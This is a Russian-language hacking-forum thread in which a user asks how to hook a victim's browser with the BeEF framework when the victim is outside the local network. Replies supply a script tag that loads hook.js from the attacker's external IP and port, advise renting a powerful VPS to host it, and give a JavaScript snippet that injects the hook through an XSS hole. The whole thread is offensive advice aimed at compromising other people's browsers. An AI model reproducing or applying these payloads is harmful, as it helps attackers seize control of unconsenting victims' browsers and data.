Как подцепить браузер жертвы через beef?

[madheller404]

Добрый день. Читал мануалы по beef, однако понятной новичку информации о подцепе браузера не нашёл. Кто знает, поясните пожалуйста наиболее понятно как проще подцепить чужой браузер. 'жертва' находится не в локальной сети.
Заранее спасибо.

 

[ketama126]

Just give him the link with js code.

 

[pxEx0Z]

Добавь на страницу (на которую перейдет пользователь) такой код
<script src="https://external_ip:port/hook.js"></script>

external_ip - внешний IP твоего сервера
По ссылке https://external_ip:port/hook.js должен загружаться код hook.js без всяких ошибок
Рекомендации - ставь все это на vds-ку, тогда проблем не будет

 

[blackteam007]

для beef лучше брать мощную впску так как на проливе большого колличества трафика твоя впска сдохнет

 

[xrahitel]

Так хочешь сделать

 

[madheller404]

Добавь на страницу (на которую перейдет пользователь) такой код
<script src="https://external_ip:port/hook.js"></script>

external_ip - внешний IP твоего сервера
По ссылке https://external_ip:port/hook.js должен загружаться код hook.js без всяких ошибок
Рекомендации - ставь все это на vds-ку, тогда проблем не будет

 

[madheller404]

А добавить его через xss? А если их нет?

 

[pxEx0Z]

А добавить его через xss? А если их нет?

Если говорим о хуке через xss, то идея сохраняется (надо пользователю отдать .js код), но меняется реализация.
Нам надо подгрузить .js код с помощью другого .js кода

Я бы попробовал сделать так:

let script = document.createElement('script');
script.src = "https://ip:port/hook.js"
document.head.append(script);

А если их нет?
Если их нет, то нет